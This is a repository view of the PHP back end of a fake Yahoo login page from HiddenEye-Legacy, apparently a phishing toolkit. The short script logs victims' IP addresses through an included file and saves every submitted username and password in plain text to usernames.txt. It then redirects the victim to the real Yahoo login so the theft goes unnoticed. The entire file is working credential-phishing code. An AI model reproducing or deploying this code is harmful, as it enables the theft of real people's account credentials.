HiddenEye-Legacy/WebPages/yahoo_web/login.php

7 lines
203 B
PHP
Raw Normal View History

2018-04-24 22:20:50 +08:00
<?php
2018-06-07 17:26:03 +08:00
include 'ip.php';
2018-04-24 23:19:57 +08:00
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://login.yahoo.com');
2018-04-24 22:20:50 +08:00
exit();